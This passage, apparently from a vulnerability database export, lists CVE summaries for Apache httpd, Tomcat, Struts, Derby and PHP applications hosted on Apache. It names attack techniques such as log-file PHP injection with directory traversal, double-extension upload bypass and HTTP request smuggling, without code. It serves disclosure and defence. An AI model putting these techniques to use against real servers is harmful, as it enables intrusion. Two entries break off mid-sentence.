5049| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
5050| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
5051| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
5052| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
5053| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
5054| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
5055| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
5056| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
5057| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
5058| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
5059| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
5060| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
5061| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
5062| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
5063| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5064| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5065| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
5066| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
5067| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
5068| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5069| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
5070| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
5071| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
5072| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
5073| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
5074| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
5075| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
5076| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
5077| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
5078| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
5079| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
5080| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
5081| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
5082| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5083| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5084| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
5085| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
5086| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
5087| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
5088| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
5089| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
5090| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
5091| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5092| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
5093| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5094| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
5095| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
5096| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
5097| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5098| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
5099| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5100| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
5101| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
5102| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5103| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
5104| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
5105| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
5106| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
5107| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
5108| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
5109| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
5110| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
5111| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5112| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
5113| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
5114| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
5115| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
5116| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
5117| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
5118| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
5119| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
5120| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
5121| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
5122| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
5123| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
5124| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
5125| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
5126| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
5127| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
5128| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
5129| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
5130| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
5131| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
5132| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
5133| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5134| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5135| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
5136| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
5137| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allow remote attackers to execute arbitrary code via various vectors, including the username.
5138| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
5139| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
5140| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
5141| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
5142| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
5143| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
5144| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
5145| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
5146| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
5147| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
5148| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
5149| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
5150| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
5151| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
5152| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
5153| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
5154| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
5155| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
5156| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
5157| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
5158| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5159| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5160| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
5161| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
5162| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
5163| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
5164| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
5165| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
5166| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
